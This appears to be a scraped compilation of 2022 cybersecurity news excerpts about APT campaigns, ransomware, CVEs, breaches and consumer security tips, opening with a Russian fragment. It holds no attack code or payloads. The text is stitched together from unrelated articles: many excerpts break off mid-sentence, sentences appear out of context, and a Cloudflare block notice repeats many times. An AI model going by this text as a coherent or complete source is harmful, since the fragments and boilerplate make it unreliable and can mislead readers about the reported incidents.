«Впервые мы сообщили о злоупотреблении GTM в отчете от 2021 года, и GTM активно эксплуатируют по сей день.

В некоторых случаях используются те же вредоносные GTM-бакеты, о которых сообщалось еще в прошлом году.

«Все три варианта используют отдельные скрипты-скиммеры и домены для извлечения данных.

At least three alleged hacktivist groups working in support of Russian interests are likely doing so in collaboration with state-sponsored cyber threat actors, according to Mandiant.

The Google-owned threat intelligence and incident response firm said with moderate confidence that "moderators of the purported hacktivist Telegram channels 'XakNet Team,' 'Infoccentr,' and 'CyberArmyofRussia_Reborn' are coordinating their operations with Russian Main Intelligence Directorate (GRU)-sponsored cyber threat actors."

To that end, four of the 16 data leaks from these groups coincided with disk wiping malware attacks by APT28 that involved the use of a strain dubbed CaddyWiper.

While the so-called ha…

A China-aligned advanced persistent threat actor known as TA413 weaponized recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called LOWZERO as part of an espionage campaign aimed at Tibetan entities.

Targets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan government-in-exile.

This is achieved by employing a Royal Road RTF weaponizer tool, which is widely shared among Chinese threat actors.

"The group continues to incorporate new capabilities while also relying on tried-and-tested [tactics, techniques, and procedures," the cybersecurity firm said.

"TA413's adopt…

The BlackCat ransomware crew has been spotted fine-tuning their malware arsenal to fly under the radar and expand their reach.

The latest refinements concern Exmatter, a data exfiltration tool used by BlackCat in its ransomware attacks.

The findings are yet another indication that ransomware groups are adept at continually adapting and refining their operations to remain effective as long as possible.

BlackCat has also been recently observed using the Emotet malware as an initial infection vector, not to mention witnessing an influx of new members from the now-defunct Conti ransomware group following the latter's withdrawal from the threat landscape this year.

Over the past two years, Babuk…

A properly configured content delivery network (CDN) can help protect websites against DoS attacks and other common malicious attacks.

However, even when all these things are done - mistakes can still happen, which is why it's still ranked as the #1 threat in the OWASP Top Ten Web Application Security Risks.

A vulnerability scanner is a cloud-based service that identifies security vulnerabilities in computer systems, networks and software.

Vulnerability management made easyIntruder's network vulnerability scanner is powered by industry-leading scanning engines used by banks and governments across the world.

Organisations around the world trust Intruder's vulnerability scanner to protect the…

Wearable technology company Fitbit has announced a new clause that requires users to switch to a Google account "sometime" in 2023.

"In 2023, we plan to launch Google accounts on Fitbit, which will enable use of Fitbit with a Google account," the Google-owned fitness devices maker said.

Rather, support for Fitbit accounts is expected to continue until at least the beginning of 2025, after which a Google account will be mandatory for using the devices.

The goal, Fitbit said, is to include a "single login for Fitbit and other Google services, industry-leading account security, centralized privacy controls for Fitbit user data, and more features from Google on Fitbit."

In January 2021, when Go…

The group specialized in the sales of 30 million accounts belonging to citizens from Ukraine and the European Union on the dark web and netted a profit of $372,000 (14 million UAH) through electronic payment systems like YooMoney, Qiwi, and WebMoney that are outlawed in the country.

"Their 'wholesale clients' were pro-kremlin propagandists," the Security Service of Ukraine (SSU) said in a press release.

"It was them who used the received identification data of Ukrainian and foreign citizens to spread fake 'news' from the front and sow panic."

"Their main activity was creation and promotion of accounts in social networks and messengers," it noted.

"The group used the bots to spread panic in …

The City of London Police on Friday revealed that it has arrested a 17-year-old teenager from Oxfordshire on suspicion of hacking.

"On the evening of Thursday 22 September 2022, the City of London Police arrested a 17-year-old in Oxfordshire on suspicion of hacking," the agency said, adding "he remains in police custody."

The department said the arrest was made as part of an investigation in partnership with the U.K. National Crime Agency's cyber crime unit.

"The administrator for that forum claimed that teapotuberhacker was the same individual who had allegedly hacked Microsoft and 'owned' Doxbin," the company disclosed Friday.

It's not immediately clear if these allegations hold water, bu…

Security software company Sophos has warned of cyberattacks targeting a recently addressed critical vulnerability in its firewall product.

The issue, tracked as CVE-2022-3236 (CVSS score: 9.8), impacts Sophos Firewall v19.0 MR1 (19.0.1) and older and concerns a code injection vulnerability in the User Portal and Webadmin components that could result in remote code execution.

As a workaround, Sophos is recommending that users take steps to ensure that the User Portal and Webadmin are not exposed to WAN.

The development marks the second time a Sophos Firewall vulnerability has come under active attacks within a year.

Sophos firewall appliances have also previously come under attack to deploy …

The Microsoft-owned code hosting service said it learned of the attack on September 16, 2022, adding the campaign impacted "many victim organizations."

The fraudulent messages claim to notify users that their CircleCI sessions have expired and that they should log in using GitHub credentials by clicking on a link.

Another bogus email revealed by CircleCI prompts users to sign in to their GitHub accounts to accept the company's new Terms of Use and Privacy Policy by following the link embedded in the message.

The attacker has also been spotted downloading private repository contents, and even creating and adding new GitHub accounts to an organization should the compromised account have organ…

A previously undocumented threat actor of unknown origin has been linked to attacks targeting telecom, internet service providers, and universities across multiple countries in the Middle East and Africa.

The threat actor is said to have primarily focused on the development of cross-platform malware in its pursuit of espionage aims.

This includes two different Windows malware platforms called metaMain and Mafalda that are expressly engineered to operate in-memory and elude detection.

Attack chains have further involved an unknown Linux malware that's employed to gather information from the compromised environment and funnel it back to Mafalda.

What's more, references in the internal command…

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a recently disclosed security flaw in Zoho ManageEngine to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation.

"Zoho ManageEngine PAM360, Password Manager Pro, and Access Manager Plus contain an unspecified vulnerability which allows for remote code execution," the agency said in a notice.

The critical vulnerability, tracked as CVE-2022-35405, is rated 9.8 out of 10 for severity on the CVSS scoring system, and was patched by Zoho as part of updates released on June 24, 2022.

Zoho has also warned of the public availability of a proof-of-concept (PoC) exploit for the vulne…

That's what we – and other security experts – were wondering when content giant Patreon recently dismissed its entire internal cybersecurity team in exchange for outsourced services.

Fire the internal team and you take a huge riskPatreon is a content-creator site that handles billions of dollars in revenue.

But here's the thing: investing in an internal cybersecurity team that's truly on top of things is designed to save you costs when it counts.

Bad for press, bad for finances, bad for securityWas there a valid reason other than cost savings for dismissing an entire in-house cybersecurity team?

The most important risk is a cybersecurity failure when firing an entire internal security team.

A hack-for-hire group that was first exposed in 2019 has expanded its focus to set its sights on entities with business or political ties to Russia.

Dubbed Void Balaur, the cyber mercenary collective has a history of launching cyberattacks against biotechnology and telecom companies since 2015.

"Void Balaur [...] primarily dabbles in cyber espionage and data theft, selling the stolen information to anyone willing to pay," Trend Micro noted at the time.

What's more, the attack infrastructure operated by Void Balaur encompasses more than 5,000 unique domains that claim to be email websites, authentication services, and public services portals.

"Void Balaur remains a highly active and evolving…

An SMS-based phishing campaign is targeting customers of Indian banks with information-stealing malware that masquerades as a rewards application.

The Microsoft 365 Defender Research Team said that the messages contain links that redirect users to a sketchy website that triggers the download of the fake banking rewards app for ICICI Bank.

Additionally, the malware is equipped with the ability to steal SMSes, potentially enabling the attacker to swipe 2FA codes sent as text messages and gain unauthorized access to victim accounts.

These commands allow the malware to harvest system metadata, call logs, intercept phone calls, as well as steal credentials for email accounts such as Gmail, Outlo…

Microsoft on Thursday warned of a consumer-facing attack that made use of rogue OAuth applications on compromised cloud tenants to ultimately seize control of Exchange servers and spread spam.

"These modifications to the Exchange server settings allowed the threat actor to perform their primary goal in the attack: sending out spam emails," Microsoft said.

"The spam emails were sent as part of a deceptive sweepstakes scheme meant to trick recipients into signing up for recurring paid subscriptions."

Microsoft's threat intelligence division said that the adversary has been actively running spam email campaigns for several years, typically sending high volumes of spam emails in short bursts th…

EdFinancial and the Oklahoma Student Loan Authority (OSLA) are notifying over 2.5 million loanees that their personal data was exposed in a data breach.

The target of the breach was Nelnet Servicing, the Lincoln, Neb.-based servicing system and web portal provider for OSLA and EdFinancial, according to a breach disclosure letter.

That exposed information included names, home addresses, email addresses, phone numbers and social security numbers for a total of 2,501,324 student loan account holders.

“With recent news of student loan forgiveness, it’s reasonable to expect the occasion to be used by scammers as a gateway for criminal activity,” Bischoping said.

Last week, the Biden administrati…

Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.

The threat actor, according to researchers, is believed to be the China-based APT TA423, also known as Red Ladon.

In lieu of malware, attackers can use ScanBox in conjunction with watering hole attacks.

Adversaries load the malicious JavaScript onto a compromised website where the ScanBox acts as a keylogger snagging all of a user’s typed activity on the infected watering hole website.

This allows ScanBox to connect to a set of pre-configured targets,” researchers explain.

The campaigns are tied to focused abuse of identity and access management firm Okta, which gained the threat actors the 0ktapus moniker, by researchers.

“These users received text messages containing links to phishing sites that mimicked the Okta authentication page of their organization.”Impacted were 114 US-based firms, with additional victims of sprinkled across 68 additional countries.

“The 0ktapus campaign has been incredibly successful, and the full scale of it may not be known for some time,” he said.

What the 0ktapus Hackers WantedThe 0ktapus attackers are believed to have begun their campaign by targeting telecommunications companies in hopes of winning access to potential targets’…

Lockbit is by far this summer’s most prolific ransomware group, trailed by two offshoots of the Conti group.

After a recent dip, ransomware attacks are back on the rise.

With data gathered by “actively monitoring the leak sites used by each ransomware group and scraping victim details as they are released,” researchers have determined that Lockbit was by far the most prolific ransomware gang in July, behind 62 attacks.

It may well be that the resurgence in ransomware attacks, and the rise of these two particular groups, are intimately connected.

Why Ransomware Has BouncedResearchers from NCC Group counted 198 successful ransomware campaigns in July – up 47 percent from June.

New research indicates that over 80,000 Hikvision surveillance cameras in the world today are vulnerable to an 11 month-old command injection flaw.

Hikvision – short for Hangzhou Hikvision Digital Technology – is a Chinese state-owned manufacturer of video surveillance equipment.

Last Fall, a command injection flaw in Hikvision cameras was revealed to the world as CVE-2021-36260.

According to David Maynor, senior director of threat intelligence at Cybrary, Hikvision cameras have been vulnerable for many reasons, and for a while.

Furthermore, IoT devices might not give users any indication that they’re unsecured or out of date.

Twitter is blasted for security and privacy lapses by the company’s former head of security who alleges the social media giant’s actions amount to a national security risk.

Twitter has responded alleging that Zatko is a “disgruntled employee” who was fired for poor performance and leadership.

This, according to Zatko, elevates his concerns to a matter of national security.

Twitter allowed some foreign governments “… to infiltrate, control, exploit, surveil and/or censor the ‘company’s platform, staff, and operations,” according to the redacted whistleblower report submitted to congress.

NEW: First time Twitter CEO @paraga weighs in on whistleblower story.

CISA is warning that Palo Alto Networks’ PAN-OS is under active attack and needs to be patched ASAP.

Earlier this month, Palo Alto Networks issued a fix for the high-severity bug (CVE-2022-0028) that it says adversaries attempted to exploit.

PAN-OS versions vulnerable to attack, with patches available, include PAN-OS prior to 10.2.2-h2, PAN-OS prior to 10.1.6-h6, PAN-OS prior to 10.0.11-h1, PAN-OS prior to 9.1.14-h4, PAN-OS prior to 9.0.16-h3 and PAN-OS prior to 8.1.23-h1.

CISA Adds Bug to KEV CatalogOn Monday, CISA added the Palo Alto Networks bug to its list of Known Exploited Vulnerabilities Catalog.

This type of attack allows an adversary to magnify the amount of malicious traffic they …

Fake travel reservations are exacting more pain from the travel weary, already dealing with the misery of canceled flights and overbooked hotels.

Warnings come from security researchers who say TA558 cybercriminals have revamped their 2018 campaigns with fake reservation emails that contain links – that if clicked – deliver a malicious malware payload containing a potpourri of malware variants.

ISO and RAR are single compressed files, that if executed, decompress the file and folder data inside of them.

TA558 conducted 27 campaigns with URLs in 2022, compared to just five campaigns total from 2018 through 2021.

This actor used a variety of delivery mechanisms including URLs, RAR attachments…

Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.

Apple is urging macOS, iPhone and iPad users immediately to install respective updates this week that includes fixes for two zero-days under active attack.

One of the flaws is a kernel bug (CVE-2022-32894), which is present both in iOS and macOS.

“For most folks: update software by end of day,” tweeted Rachel Tobac, the CEO of SocialProof Security, regarding the zero-days.

The flaws in iOS are especially worrying, given the ubiquity of iPhones and users’ utter reliance on mobile devices for their daily lives, he said.

Google has patched the fifth actively exploited zero-day vulnerability discovered in Chrome this year as one in a series of fixes included in a stable channel update released Wednesday.

Google credits Ashley Shen and Christian Resell of its Google Threat Analysis Group (TAG) for reporting the zero-day bug, which could allow for arbitrary code execution, on July 19.

FedCM—short for the Federated Credential Management API–provides a use-case-specific abstraction for federated identity flows on the web, according to Google.

Fifth Chrome 0Day Patch So FarThe zero-day patch is the fifth Chrome bug under active attack that Google has patched so far this year.

In April, Google patched CVE-2022-136…

The North Korean APT is using a fake job posting for Coinbase in a cyberespionage campaign targeting users of both Apple and Intel-based systems.

North Korean APT Lazarus is up to its old tricks with a cyberespionage campaign targeting engineers with a fake job posting that attempt to spread macOS malware.

The malicious Mac executable used in the campaign targets both Apple and Intel chip-based systems.

However, the most recent malware is signed July 21, according to its timestamp, which means it’s either something new or a variant of the previous malware.

The malware used in the campaign also connects to a different command and control (C2) infrastructure than the malware discovered in May…

A U.K. water supplier suffered a disruption in its corporate IT systems Monday as a result of a cyber-attack but claims that its water supply was not affected.

Victim MisidentifiedThe Clop ransomware gang took responsibility for an attack on a U.K. water supplier on its dark web site, but said the victim was Thames Water and not South Staffordshire, according to a report posted on Bleepingcomputer.

Thames Water is the United Kingdom’s largest water supplier, serving 15 million customers in Greater London and other areas on the river that runs through the city.

Thames Water quickly took to its website to let all of its customers know that any media report claiming it suffered a cyber-attack …

WeChat Pay is a mobile payment and digital wallet service developed by a firm of the same name, which is based in China.

The service is used by over 300 million customers and allows Android users to make mobile payments and online transactions.

The core issue with Xiaomi phone was the mobile phones payment method and the Trusted Execution Environment (TEE) component of the phone.

Using a regular, unprivileged Android application, they were able to communicate with the trusted soter app via “SoterService,” an API for managing soter keys.

But the issue is even more significant for the Far East, where the market for mobile payments is already way ahead.

There was nothing typical this year at BSides LV, Black Hat USA and DEF CON – also known collectively as Hacker Summer Camp.

Belgian researcher Lennert Wouters revealed at Black Hat how he mounted a successful fault injection attack on a user terminal used to manage the satellite.

For fans of FUD, PC Magazine has a nice rundown of “The 14 Scariest Things We Saw at Black Hat 2022“.

Topics of DiscussionThe main Black Hat keynote was from Chris Krebs, former Cybersecurity and Infrastructure Security Agency (CISA), who shared his optimism when it comes to the US approach to information security.

ESET provided Black Hat attendees with an update on cyberattacks against Ukraine.

Zeppelin ransomware is back and employing new compromise and encryption tactics in its recent campaigns against various vertical industries—particularly healthcare—as well as critical infrastructure organizations, the feds are warning.

Tech companies also remain in the crosshairs of Zeppelin, with threat actors also using the RaaS in attacks against defense contractors, educational institutions and manufacturers, the agency said.

They then deploy Zeppelin ransomware as a .dll or .exe file or contained within a PowerShell loader.

Multiple EncryptionOnce Zeppelin ransomware is executed on a network, each encrypted file is appended with a randomized nine-digit hexadecimal number as a file exte…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

A major financial services company has learned the hard way about the importance of proper disposal of customers’ personal dataThe U.S. Securities and Exchange Commission (SEC) has announced that Morgan Stanley has agreed to pay a penalty of $35 million for exposing the personal information of 15 million customers.

According to SEC, the financial services company failed to properly dispose of hard drives and servers that contained the personal data of its customers.

The issue highlights the need for companies to follow secure data disposal practices and rely on help from experts in the field.

Watch the video to learn more.

Sign up to receive an email update whenever a new article is publish…

Not only because it is essential to teach children how to read and understand information online and generally navigate the internet, but especially because of a potentially overwhelming list of risks lurking online.

If needed, help them set it up and so protect the online accounts that are home to their most personal data.

And, just in case, also remind them never to lend their devices to someone they don’t know – and this is not up for debate.

Your kids should know that the internet is a place where people, hidden behind computers, can be mean.

Teach kids to be careful, not only with people they don’t know, but also with people they know.

What’s the good and the bad of using biometric traits for authentication?

As biometric identification becomes more common and reliable, it is also increasingly used as a default authentication technology.

Face recognition can work in different ways: simple image comparison, video sequences, three-dimensional data, or image composition by multiple cameras.

Voice recognition“Hey Google” or “Hey Siri” are simple commands you can use to interact with your phone’s voice assistant.

In fact, these are voice recognition systems, responding only to your specific voice commands.

This bypasses the built-in limitations to content from Apple’s App Store, allowing users to sideload apps and widgets from third-party stores.

Fake apps in the App StoreApple’s official store on your iOS device is generally known for providing safe content.

Any application made available on the App Store has gone through a process that checked for bugs, privacy policy concerns, identification of third-party ad providers, and licensing requirements.

Fake Antivirus found on Apple's App Store charges €134,99 per 3 months for removing non existing viruses.

If you have apps you’re not using, like wallpaper or weather apps, delete them.

The news seems awash this week with reports of both Microsoft and Apple scrambling to patch security flaws in their productsThe news seems awash this week with tech companies scrambling to patch security vulnerabilities in their software.

This month’s Patch Tuesday saw Microsoft plug 64 security holes, including a zero-day that is being actively exploited in the wild.

Apple also joined the party, issuing security updates for both iOS and macOS and also plugging a zero day that is being abused in real-world attacks.

Watch the video to learn more – and consider reading our articles about the subject of secure coding.

Sign up to receive an email update whenever a new article is published in ou…

In 2020, Apple updated Intelligent Tracking Prevention in Safari and, in 2021, Mozilla rolled out Total Cookie Protection in Firefox to clamp down on tracking via third-party cookies.

A freshly installed web browser may not be blocking third-party cookies by default.

First-party cookies vs. third-party cookiesTracking via cookies can happen in both first-party and third-party contexts.

The following list describes where to find the third-party cookie settings in a smattering of the most popular web browsers.

Thus, in addition to checking the third-party cookie settings offered by each browser app, make sure this setting is not selected:Conclusion: Predicting the death of third-party trackin…

ESET Research first spotted this variant of the SideWalk backdoor in the network of a Hong Kong university in February 2021ESET researchers have published their findings about a Linux variant of the SideWalk backdoor, which is one of a number of custom implants used by the SparklingGoblin APT group.

This piece of malware was first detected by ESET in February 2021 in the network of a Hong Kong university.

The same university had previously been on the receiving end of attacks by SparklingGoblin during student protests in May 2020.

Watch the video with ESET Chief Security Evangelist Tony Anscombe to learn what there is to know about this ESET research.

For a full technical analysis, head ove…

We also discovered that a previously known Linux backdoor – the Specter RAT, first documented by 360 Netlab – is also actually a SideWalk Linux variant, having multiple commonalities with the samples we identified.

This blogpost documents SideWalk Linux, its victimology, and its numerous similarities with the originally discovered SideWalk backdoor.

We first documented the Linux variant of SideWalk as StageClient on July 2nd, 2021, without making the connection at that time to SparklingGoblin and its custom SideWalk backdoor.

ConclusionThe backdoor that was used to attack a Hong Kong university in February 2021 is the same malware family as the SideWalk backdoor, and actually is a Linux var…

Has your Wi-Fi speed slowed down to a crawl? Here are some of the possible reasons along with a few quick fixes to speed things up.

The post Why is my Wi‑Fi slow and how do I make it faster? appeared first on WeLiveSecurity

Worok takes aim at various high-profile organizations that operate in multiple sectors and are located primarily in AsiaESET researchers have revealed their findings about a previously unknown cyberespionage group that they named Worok.

This APT group takes aim at various high-profile organizations that operate in multiple sectors and are located primarily in Asia, but also in the Middle East and Africa.

Worok uses both its own toolkit and existing tools to compromise its targets and has in some cases exploited the infamous ProxyShell vulnerabilities to gain initial access and harvest information.

The full analysis is available here: Worok: The big pictureSign up to receive an email update …

The global market for smart toys is set to see percentage growth in the double digits, to exceed US$24 billion by 2027.

What are smart toys and what are the cyber-risks?

Smart toys have been around for several years.

Attackers could theoretically hijack a smart toy with audio capabilities to hack smart homes, by sending audio commands to a voice-activated system (i.e., “Alexa, open the front door”).

Smart toys can indeed be educational and entertaining.

About the same time this change was occurring, ESET re-introduced our global threat reports, and one of the things we noted was RDP attacks continued to grow.

New data on SMB attacksWith the set of data on RDP attacks came an unexpected addition of telemetry from attempted Server Message Block (SMB) attacks.

Use of the exploit continued to grow through 2018, 2019, and into 2020, according to ESET telemetry.

Final thoughtsIt is important to note that this information presented in this revised paper was gathered from ESET’s telemetry.

Because of these factors, the absolute number of attacks is going to be higher than what we can learn from ESET’s telemetry.

After executing the backdoor command, PowHeartBeat sends the result as a POST request to the C&C server.

PowHeartBeat command descriptionsName Command Identifier Description Cmd 0x02 Execute a PowerShell command.

FileView 0x0A Get file information of a specific directory, in particular:· Filenames· File attributes· Last write times· File contents FileDelete 0x0C Delete a file.

Resource Development T1583.004 Acquire Infrastructure: Server Worok uses its own C&C servers.

Defense Evasion T1140 Deobfuscate/Decode Files or Information Worok uses various custom XOR-based schemes to encrypt strings and logs in PowHeartBeat, PNGLoad, and CLRLoad.

What if your organization is hit by a cyberattack that is attributed to a nation state?

Would your insurance cover the costs of the attack?

This question is all the more pertinent against the backdrop of the ongoing war in Ukraine and the warnings of cyber-war potentially spreading beyond the conflict zone.

Watch the video to learn about how insurers and reinsurers may handle claims involving cyberattacks that were attributed to state-sponsored attackers.

Sign up to receive an email update whenever a new article is published in our Ukraine Crisis – Digital Security Resource Center Submit

How should you manage your digital legacy?

However, this requires that someone send a picture of your death certificate to Meta that informs them of your passing.

AppleApple introduced in 2021 the possibility of choosing a Legacy Contact.

However, planning the management of your digital legacy is a situation where it might not only be desirable to break that rule just once – you may feel that doing so is necessary.

As Microsoft suggests, this is what you should do to provide for digital legacy planning, and most other online services are clearly more easily managed by your digital executor if they simply have access to your accounts’ credentials and can log in as if they were you.

Have you listened to our podcast?

Have you listened to our podcast?

S3 Ep101: Uber and LastPass breaches – is 2FA all it’s cracked up to be?

[Audio + Text]

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

UBER HAS BEEN HACKED, boasts hacker – how to stop it happening to you

S3 Ep100: Imagine you went to the moon – how would you prove it?

[Audio + Text]

Have you listened to our podcast?

Have you listened to our podcast?

How to deal with dates and times without any timezone tantrums…

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Have you listened to our podcast?

Ransomware gangs are planning on trying out a new tactic, and it involves the destruction of the victims’ data.

Targeting the dataResearchers from Symantec, Cyderes and Stairwell have recently analyzed a new version of the Exmatter data exfiltration tool and have spotted a new capability: data corruption.

Also, “The function that instantiates the Eraser class, named Erase, does not appear to be fully implemented and does not decompile correctly.”Why are ransomware gangs thinking about destroying victims’ data?

We may be witnessing the beginning of a new shift in how ransomware gangs aim to force victims to pay up.

Also, if the data is destroyed on victims’ systems, the attackers have the on…

Sophos has patched an actively exploited remote code execution vulnerability (CVE-2022-3236) in its Firewall solutions, and has pushed the fix to customers who have automatic installation of hotfixes enabled.

About CVE-2022-3236CVE-2022-3236 is a code injection vulnerability in the User Portal and Webadmin of Sophos Firewall.

If successfully exploited, it allows for remote code execution (RCE) on the targeted vulnerable installation.

It affects Sophos Firewall v19.0 MR1 (19.0.1) and older.

“Users of older versions of Sophos Firewall are required to upgrade to receive the latest protections, and this fix,” the company said.

Without a backup, data loss is inevitable.

Where you store your data backup is nearly as important as creating copies in the first place.

Just because your data is backed up does not mean it can be recovered — without a restoration strategy, you may still lose data.

Much like any effective disaster recovery plan, you cannot expect to correctly execute a plan without practice.

Creating a successful backup and recovery strategy requires honest assessments of a company’s capabilities and current processes.

In this Help Net Security video, Joe Leonard, CTO at GuidePoint Security, illustrates how the role of the CIO is changing as cybersecurity priorities and responsibilities are creeping into the job description.

Globally, CIOs find it most difficult to solve challenges related to data privacy/security (66%) and cybersecurity/ransomware (66%), according to a global research study from Lenovo.

From zero trust implementations to network segmentations, CIOs are navigating a cybersecurity battlefield with often little background and resources at their disposal.

In this Help Net Security video interview, George Finney, CSO at Southern Methodist University, talks about his latest book – “Project Zero Trust: A Story about a Strategy for Aligning Security and the Business“.

Presented in the form of a fictional narrative involving a breach at a company, the book tracks the actions of the company’s new IT Security Director.

Readers will learn John Kindervag‘s 5-Step methodology for implementing Zero Trust, the four Zero Trust design principles, and how to limit the impact of a breach.

They’ll also find:Concrete strategies for aligning your security practices with the businessCommon myths and pitfalls when implementing Zero Trust and how to implement it …

Code Intelligence has open-sourced a new security tool, CI Fuzz CLI, which lets developers run coverage-guided fuzz tests directly from the command line to find and fix vulnerabilities at scale.

Google’s Open-Source-Security (OSS) team recently reported more than 40,500 bugs in 650 open-source projects have been detected through fuzz testing.

Easy fuzz testingCode Intelligence’s new open-source tool aims to tackle these challenges by making fuzz testing usable for all developers.

CI Fuzz CLI allows developers to run a fuzz test with only 3 commands.

That’s why we’ve made it possible to integrate the CI Fuzz CLI into common IDEs, such as Visual Studio Code and CLion.

The APWG’s Phishing Activity Trends Report reveals that in the second quarter of 2022, the APWG observed 1,097,811 total phishing attacks — the worst quarter for phishing that APWG has ever observed.

The total for June was 381,717 attacks or phishing sites.

The number of phishing attacks reported has quadrupled since early 2020 — when APWG was observing between 68,000 and 94,000 attacks per month.

In the first quarter of 2022, OpSec Security found that phishing attacks against the financial sector, which includes banks, remained the largest set of attacks, accounting for 27.6 percent of all phishing.

Attacks against webmail and software-as-a-service (SAAS) providers remained prevalent as we…

SolarWinds unveils the results of its survey examining the state of the technology job market amid industry-wide labor shortages and hiring challenges.

Released to coincide with the eighth-annual IT Pro Day holiday, the survey found despite a potential economic downturn, more than two-thirds of tech and IT professionals surveyed said they’re completely confident in their career choices.

Meanwhile, when asked what’s most important to them in their careers, IT pros ranked salary and work-life balance highest.

The state of the technology job market67% of IT pros surveyed say they’re completely confident about their career choice, even in the face of a potential economic downturn.

However, 31% …

Authomize has expanded its REST API framework that enables customers to easily build their own custom connectors to their cloud and homegrown applications and services in as little as a couple of hours.

Authomize’s Software-as-a-Service (SaaS) solution enables organizations to automatically secure access privileges across their entire cloud stack, including IaaS, SaaS, and IAM solutions.

Utilizing native connectors, REST APIs, SCIM connectors, and a file uploader, Authomize can ingest, normalize, and analyze identity and access data from any cloud, on-prem, or homegrown application or service.

and more,” he says, “They are using these connectors to get the same high level of IAM permission …

3 free Linux security training courses you can take right nowLearning how to effectively navigate and interact with Linux can be an important part of your learning journey in cybersecurity.

The impact of location-based fraudIn this Help Net Security video, André Ferraz, CEO at Incognia, talks about the impact of location-based fraud, which is more prevalent than one would imagine, and it impacts different industries in many different ways.

In this Help Net Security video, Jeffrey J. Engle, Chair and President of Conquest Cyber, talks about why the increase in spending is necessary and whether it is enough to protect critical infrastructure.

Agent-based vs. agentless security: Pros and consI…

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

